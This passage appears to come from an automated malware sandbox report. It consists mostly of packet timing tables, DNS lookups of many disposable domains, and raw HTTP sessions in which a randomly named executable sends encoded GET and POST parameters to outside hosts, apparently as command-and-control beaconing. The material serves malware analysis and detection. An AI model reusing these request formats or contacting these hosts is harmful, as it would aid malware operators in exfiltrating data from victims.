                                                                                                              Nov 5, 2024 15:37:28.821978092 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:28.939783096 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149008989 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149110079 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149153948 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149194956 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149236917 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149277925 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149399042 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149396896 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.149403095 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149566889 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.149611950 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149616957 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149739027 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.149908066 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.267188072 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267251968 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267323971 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267366886 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267405987 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267447948 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267488003 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267529964 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267570019 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267601013 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.267602921 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267601013 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.267780066 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.267935038 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:30.333250046 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.350759029 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.470257998 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.470443010 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.478069067 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.595494986 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809813976 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809847116 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809855938 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809863091 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809870958 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809915066 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809936047 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809943914 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809967041 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809973955 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.810087919 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.810144901 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.932573080 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932672977 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932682991 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932689905 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932724953 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932733059 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932801962 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932832956 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932842970 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700716972 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700735092 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700746059 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700756073 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700767040 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700778961 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.704250097 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.704279900 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.704461098 CET4980980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:39.005850077 CET4980980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.023344994 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.220012903 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:40.220355988 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.225492954 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.431312084 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:40.483453989 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:40.483504057 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:40.483769894 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.485595942 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.683058977 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.490988970 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:45.670212984 CET8049811203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.670469999 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:45.678103924 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:45.856096029 CET8049811203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.871273994 CET8049811203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.871320963 CET8049811203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.871561050 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:47.191524982 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:48.208937883 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:48.384895086 CET8049812203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:48.385193110 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:48.392868996 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:48.569284916 CET8049812203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:48.576363087 CET8049812203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:48.576443911 CET8049812203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:48.576606989 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:49.894114971 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:50.911525011 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:51.089315891 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.089576006 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:51.098264933 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:51.098340034 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:51.276853085 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.276973009 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.276988029 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.276997089 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.277017117 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.290591955 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.290607929 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.290785074 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:52.612345934 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:53.631563902 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:53.810650110 CET8049814203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:53.810973883 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:53.816171885 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:53.994154930 CET8049814203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:54.002469063 CET8049814203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:54.002515078 CET8049814203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:54.002943039 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:54.004715919 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:54.182323933 CET8049814203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.019200087 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.195050001 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.195239067 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.203851938 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.383042097 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383099079 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383141041 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383183002 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383213043 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383238077 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.383245945 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383404016 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.383404970 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:00.719849110 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:01.737302065 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:01.915448904 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:01.915712118 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:01.923854113 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:02.104667902 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104680061 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104686975 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104818106 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104820013 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:02.104825020 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104857922 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.105016947 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:03.438052893 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.455439091 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.632527113 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.632754087 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.640604973 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.640657902 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.640702009 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.818608999 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.818669081 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.819040060 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830723047 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830780983 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830822945 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830864906 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830893993 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830924988 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.831001043 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.831065893 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:06.156111002 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.173577070 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.350042105 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.350253105 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.355928898 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.534816980 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.534876108 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.534919024 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.534960985 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535002947 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535043955 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535064936 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.535087109 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535130978 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535160065 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535187006 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.535192966 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535234928 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.535449982 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.535449982 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.537337065 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.713538885 CET804981868.65.122.222192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                              Nov 5, 2024 15:36:22.678458929 CET192.168.11.201.1.1.10x3851Standard query (0)www.mynotebook.shopA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:35.956841946 CET192.168.11.201.1.1.10x9274Standard query (0)www.bav.latA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:44.126966000 CET192.168.11.201.1.1.10xe631Standard query (0)www.notepad.mobiA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:57.405277014 CET192.168.11.201.1.1.10x20d3Standard query (0)www.5oxzis.topA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:58.418445110 CET192.168.11.209.9.9.90x20d3Standard query (0)www.5oxzis.topA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:37:06.591197968 CET192.168.11.209.9.9.90x305fStandard query (0)www.hyman.lifeA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:38:23.604027987 CET192.168.11.209.9.9.90xe123Standard query (0)www.pwk-24.xyzA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 15:33:52.427223921 CET | 1.1.1.1 | 192.168.11.20 | 0xb3cc | No error (0) | www.nagasl89.baby |  | 104.21.94.87 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:33:52.427223921 CET | 1.1.1.1 | 192.168.11.20 | 0xb3cc | No error (0) | www.nagasl89.baby |  | 172.67.221.147 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:34:08.479995012 CET | 1.1.1.1 | 192.168.11.20 | 0xa019 | No error (0) | www.abuali-contracting.art | abuali-contracting.art |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:34:08.479995012 CET | 1.1.1.1 | 192.168.11.20 | 0xa019 | No error (0) | abuali-contracting.art |  | 66.198.240.15 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:34:21.964540958 CET | 1.1.1.1 | 192.168.11.20 | 0xa3b8 | No error (0) | www.godskids.store | godskids.store |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:34:21.964540958 CET | 1.1.1.1 | 192.168.11.20 | 0xa3b8 | No error (0) | godskids.store |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:34:21.964540958 CET | 1.1.1.1 | 192.168.11.20 | 0xa3b8 | No error (0) | godskids.store |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:34:35.453181982 CET | 1.1.1.1 | 192.168.11.20 | 0x289c | No error (0) | www.030002832.xyz |  | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:34:49.968568087 CET | 1.1.1.1 | 192.168.11.20 | 0xa5fe | No error (0) | www.wonders8.live | wonders8.live |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:34:49.968568087 CET | 1.1.1.1 | 192.168.11.20 | 0xa5fe | No error (0) | wonders8.live |  | 119.18.54.27 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:35:04.905602932 CET | 1.1.1.1 | 192.168.11.20 | 0x5e45 | Name error (3) | www.pwk-24.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:35:13.368509054 CET | 1.1.1.1 | 192.168.11.20 | 0x57db | No error (0) | www.nidedabeille.net | nidedabeille.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:35:13.368509054 CET | 1.1.1.1 | 192.168.11.20 | 0x57db | No error (0) | nidedabeille.net |  | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:35:27.106681108 CET | 1.1.1.1 | 192.168.11.20 | 0x1537 | No error (0) | www.brunvox.site |  | 203.161.41.204 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:35:40.724112988 CET | 1.1.1.1 | 192.168.11.20 | 0xdb58 | No error (0) | www.osi.garden | osi.garden |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:35:40.724112988 CET | 1.1.1.1 | 192.168.11.20 | 0xdb58 | No error (0) | osi.garden |  | 68.65.122.222 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:35:55.158598900 CET | 1.1.1.1 | 192.168.11.20 | 0xe6d5 | No error (0) | www.983743.vin |  | 45.150.55.15 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:36:09.519973993 CET | 1.1.1.1 | 192.168.11.20 | 0xbedc | No error (0) | www.parkerstraus.dev | parkerstraus.netlify.app |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:36:09.519973993 CET | 1.1.1.1 | 192.168.11.20 | 0xbedc | No error (0) | parkerstraus.netlify.app |  | 50.19.214.227 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:36:09.519973993 CET | 1.1.1.1 | 192.168.11.20 | 0xbedc | No error (0) | parkerstraus.netlify.app |  | 100.28.201.155 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:36:22.788470030 CET | 1.1.1.1 | 192.168.11.20 | 0x3851 | No error (0) | www.mynotebook.shop |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:36:22.788470030 CET | 1.1.1.1 | 192.168.11.20 | 0x3851 | No error (0) | www.mynotebook.shop |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:36:36.071552992 CET | 1.1.1.1 | 192.168.11.20 | 0x9274 | Name error (3) | www.bav.lat | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:36:44.246532917 CET | 1.1.1.1 | 192.168.11.20 | 0xe631 | No error (0) | www.notepad.mobi |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:36:44.246532917 CET | 1.1.1.1 | 192.168.11.20 | 0xe631 | No error (0) | www.notepad.mobi |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:36:58.527209997 CET | 9.9.9.9 | 192.168.11.20 | 0x20d3 | Name error (3) | www.5oxzis.top | none | none | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:37:00.038125992 CET | 1.1.1.1 | 192.168.11.20 | 0x20d3 | No error (0) | www.5oxzis.top |  | 20.2.217.253 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:37:06.703083992 CET | 9.9.9.9 | 192.168.11.20 | 0x305f | No error (0) | www.hyman.life | hyman.life |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 5, 2024 15:37:06.703083992 CET | 9.9.9.9 | 192.168.11.20 | 0x305f | No error (0) | hyman.life |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:37:06.703083992 CET | 9.9.9.9 | 192.168.11.20 | 0x305f | No error (0) | hyman.life |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 5, 2024 15:38:23.718144894 CET | 9.9.9.9 | 192.168.11.20 | 0xe123 | Name error (3) | www.pwk-24.xyz | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49741 | 104.21.94.87 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:33:52.541462898 CET | 457 | OUT | GET /vq3l/?Q2_4=WKR5ld2WiQxHxPDU6pm8hrTzAxfoYD+zNd+jQFHpl4y5z9MlTNWt1pAD28TX6W++2340V0NEzWPPUH5FlugQl+5D7H7BO9/OK4RESnHOQd/yty8pNcZLL2g=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.nagasl89.baby
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Nov 5, 2024 15:33:53.247127056 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:33:53 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              vary: Accept-Encoding
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xYFQ15sgg3sNfaHR7ZWbibC%2FoexqyuLJIbPFTcdmwXy%2Few4tVOYXnv4ZZsG2I9%2B%2FWCe%2Bh2euRAluH21zly4wVAC8B92TOdwqSxZ07XO2ODRBJp%2FpQn4gBzpuqRuv3tXnI1uGWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ddd8fb7b8f2726f-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=104780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                              Data Ascii: 2099<!DOCTYPE html><html lang="id-ID"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" /><meta name="generator" content="BukanWordpress" /><link rel="icon" type="image/x-icon" href="https://www.nagasl89.baby/favicon.ico" /><link rel="sitemap" href="https://www.nagasl89.baby/sitemap.xml" /><link rel="alternate" type="application/rss+xml" title="RTP SLOTO


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49742 | 66.198.240.15 | 80 | 4732 | C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:34:08.607916117 CET | 753 | OUT | POST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Ascii: Q2_4=jHoh0b4NWKuCmvAZtmE9D8JGoFs+/u3ue6gHXv2EKaUob1GKt9GjbohJwdN6IozfjU9t9F4Ijm5HAen7Afw6SmrBSwSE7AgOoqqmxv3BKvtbS6n1cg3RZqX871y+5PjC5JI1f1NtsbfTww+7XOL7GCptgHjXgQKxE9pSVsFcQ+0sCAD4LfT2FmANHVRqgvx3QQ==
Nov 5, 2024 15:34:08.941663027 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:34:08 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID: 2
Source IP: 192.168.11.20
Source Port: 49743
Destination IP: 66.198.240.15
Destination Port: 80
PID: 4732
